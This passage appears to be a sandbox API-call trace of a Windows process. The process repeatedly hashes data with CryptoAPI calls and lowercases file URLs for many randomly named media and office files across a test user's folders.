CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x90, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.354] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/ooXNyk_4pJP8xNyL.mkv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/ooxnyk_4pjp8xnyl.mkv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/ooxnyk_4pjp8xnyl.mkv" [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x88, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.354] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/29RSmdpClq8qc.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/29rsmdpclq8qc.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/29rsmdpclq8qc.jpg" [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65ed08, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65ed08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65ed08) returned 1 [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x90, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.354] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/ymNmnadn0Dl.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ymnmnadn0dl.avi") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ymnmnadn0dl.avi" [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.355] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.355] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.355] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.355] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.355] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.355] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/CIvwLQB/T30qk%20P5JugQvi%20NK9vl.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb/t30qk%20p5jugqvi%20nk9vl.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb/t30qk%20p5jugqvi%20nk9vl.mp3" [0067.355] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.355] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xb6, dwFlags=0x0) returned 1 [0067.355] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.355] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.355] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.355] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0xb8, dwFlags=0x0) returned 1 [0067.355] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.355] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/KDZXaVb4Ly4xtXaUch.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/kdzxavb4ly4xtxauch.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/kdzxavb4ly4xtxauch.xlsx" [0067.355] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.355] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x9c, dwFlags=0x0) returned 1 [0067.355] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.355] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/0prJc8jSldW.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/0prjc8jsldw.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/0prjc8jsldw.png" [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/TV%20fWTmAldt.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/tv%20fwtmaldt.gif") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/tv%20fwtmaldt.gif" [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/lN58Ms-loCvd13a.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ln58ms-locvd13a.gif") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ln58ms-locvd13a.gif" [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/WrMrVHljexM.odt" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/wrmrvhljexm.odt") returned="file:///c:/users/ciihmnxmn6ps/documents/wrmrvhljexm.odt" [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/nahIFjynqB9.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/nahifjynqb9.wav") returned="file:///c:/users/ciihmnxmn6ps/desktop/nahifjynqb9.wav" [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/c7F6ia0m%20rIQqL.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/c7f6ia0m%20riqql.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/c7f6ia0m%20riqql.gif" [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/scGdb2.docx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/scgdb2.docx") returned="file:///c:/users/ciihmnxmn6ps/documents/scgdb2.docx" [0067.355] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/ZIBcxrMhqVRy.pdf" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/zibcxrmhqvry.pdf") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/zibcxrmhqvry.pdf" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/kLTHijgx-ys.ods" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/klthijgx-ys.ods") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/klthijgx-ys.ods" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/BtJl.pptx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/btjl.pptx") returned="file:///c:/users/ciihmnxmn6ps/documents/btjl.pptx" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/F9s9QuQPKjgITIY-0wJn.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/f9s9quqpkjgitiy-0wjn.wav") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/f9s9quqpkjgitiy-0wjn.wav" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/GhQq.pptx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/ghqq.pptx") returned="file:///c:/users/ciihmnxmn6ps/documents/ghqq.pptx" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/92kmdOizrhs.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/92kmdoizrhs.bmp") returned="file:///c:/users/ciihmnxmn6ps/desktop/92kmdoizrhs.bmp" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/2ZtY-Jixsa2fGukJCQl.xls" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/2zty-jixsa2fgukjcql.xls") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/2zty-jixsa2fgukjcql.xls" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/UCcZH0tuh8.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/ucczh0tuh8.wav") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/ucczh0tuh8.wav" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/11rXyo20WdbLDOoTgRR.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/11rxyo20wdbldootgrr.jpg") returned="file:///c:/users/ciihmnxmn6ps/desktop/11rxyo20wdbldootgrr.jpg" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/Dpz8boAHVx5_k.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/dpz8boahvx5_k.mp3") returned="file:///c:/users/ciihmnxmn6ps/desktop/dpz8boahvx5_k.mp3" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/7APIQXt.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/7apiqxt.xlsx") returned="file:///c:/users/ciihmnxmn6ps/desktop/7apiqxt.xlsx" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/X3H2KL.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/x3h2kl.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/x3h2kl.xlsx" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/OB07.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/ob07.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/ob07.gif" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/wGLSi714pZKPrw0.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/wglsi714pzkprw0.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/wglsi714pzkprw0.m4a" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/Az3W-s59D7IcIR.mp4" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/az3w-s59d7icir.mp4") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/az3w-s59d7icir.mp4" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/ngoHNmUuXxI2.mp4" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/ngohnmuuxxi2.mp4") returned="file:///c:/users/ciihmnxmn6ps/desktop/ngohnmuuxxi2.mp4" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/b7BfNjDiVvNI6hV.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/b7bfnjdivvni6hv.wav") returned="file:///c:/users/ciihmnxmn6ps/desktop/b7bfnjdivvni6hv.wav" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/oQJM6R.mp4" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/oqjm6r.mp4") returned="file:///c:/users/ciihmnxmn6ps/videos/oqjm6r.mp4" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/vrj3GvHCF.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/vrj3gvhcf.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/vrj3gvhcf.jpg" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/Se0wrwFzR6z21pbI3P.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/se0wrwfzr6z21pbi3p.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/se0wrwfzr6z21pbi3p.flv" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/0n6w_32.csv" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/0n6w_32.csv") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/0n6w_32.csv" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/Gelb%20gu.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/gelb%20gu.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/gelb%20gu.mp3" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/T3ZZJ.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/t3zzj.gif") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/t3zzj.gif" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f/qcXq_E7pE3gR.mkv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/qcxq_e7pe3gr.mkv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/qcxq_e7pe3gr.mkv" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/P0F7Yrmu.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/p0f7yrmu.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/p0f7yrmu.mp3" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/kFd5akCxY.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/kfd5akcxy.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/kfd5akcxy.gif" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/_k70R%20Cri.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/_k70r%20cri.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/_k70r%20cri.jpg" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/SceC8E-.xls" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/scec8e-.xls") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/scec8e-.xls" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/2%20214WnbGPsAyl.pptx" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/2%20214wnbgpsayl.pptx") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/2%20214wnbgpsayl.pptx" [0067.356] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/O%20iSz0SXnMYLX.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/o%20isz0sxnmylx.m4a") returned="file:///c:/users/ciihmnxmn6ps/desktop/o%20isz0sxnmylx.m4a" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/LtcRkuS.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/ltcrkus.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/ltcrkus.avi" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/UZxIVykBKn%20bPk_FpxIF.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/uzxivykbkn%20bpk_fpxif.wav") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/uzxivykbkn%20bpk_fpxif.wav" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/WTILC_gn" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/wtilc_gn") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/wtilc_gn" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/2Da9ixYtx.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/2da9ixytx.m4a") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/2da9ixytx.m4a" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/WTILC_gn/hddr0bB.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/wtilc_gn/hddr0bb.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/wtilc_gn/hddr0bb.jpg" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/RHlJ1Rq.ots" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/rhlj1rq.ots") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/rhlj1rq.ots" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/x%20dl4ZMeYPcXhHegkc.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/x%20dl4zmeypcxhhegkc.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/x%20dl4zmeypcxhhegkc.m4a" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/MHikGBWT8tRn.docx" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/mhikgbwt8trn.docx") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/mhikgbwt8trn.docx" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/1HnLHpD762F.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/1hnlhpd762f.m4a") returned="file:///c:/users/ciihmnxmn6ps/desktop/1hnlhpd762f.m4a" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/WTILC_gn/J2CvFUzD29ZnFKWMrD.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/wtilc_gn/j2cvfuzd29znfkwmrd.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/wtilc_gn/j2cvfuzd29znfkwmrd.png" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/TTh5.mp4" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/tth5.mp4") returned="file:///c:/users/ciihmnxmn6ps/desktop/tth5.mp4" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/2%207fe%203xy2.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/2%207fe%203xy2.m4a") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/2%207fe%203xy2.m4a" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/aGYslBKwbc.rtf" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/agyslbkwbc.rtf") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/agyslbkwbc.rtf" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/aa-MhpiZt.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/aa-mhpizt.jpg") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/aa-mhpizt.jpg" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/ZQO2zME.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/zqo2zme.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/zqo2zme.flv" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/RE6Bl%20il.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/re6bl%20il.bmp") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/re6bl%20il.bmp" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/wEI8Jype31Y2tUcLqG.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/wei8jype31y2tuclqg.avi") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/wei8jype31y2tuclqg.avi" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/lyPZbXR157PQZfH.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lypzbxr157pqzfh.mp3") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lypzbxr157pqzfh.mp3" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f/4l52g1Gde.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/4l52g1gde.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/4l52g1gde.avi" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/5kPs8QJhzRoqdnRaIa.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/5kps8qjhzroqdnraia.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/5kps8qjhzroqdnraia.xlsx" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/5PWfNscpPTcBp.pdf" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/5pwfnscpptcbp.pdf") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/5pwfnscpptcbp.pdf" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/sgFS2zZuqdLk0.pps" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/sgfs2zzuqdlk0.pps") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/sgfs2zzuqdlk0.pps" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/x5ZnxcBu.odp" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/x5znxcbu.odp") returned="file:///c:/users/ciihmnxmn6ps/documents/x5znxcbu.odp" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/slOo.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/sloo.gif") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/sloo.gif" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/-wPd%20fM1Ps-I.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/-wpd%20fm1ps-i.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/-wpd%20fm1ps-i.gif" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/IL6YC1qmygi.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/il6yc1qmygi.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/il6yc1qmygi.mp3" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/HUfek3KyHcnml5.mkv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/hufek3kyhcnml5.mkv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/hufek3kyhcnml5.mkv" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/h2k4AAbsc75.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/h2k4aabsc75.mp3") 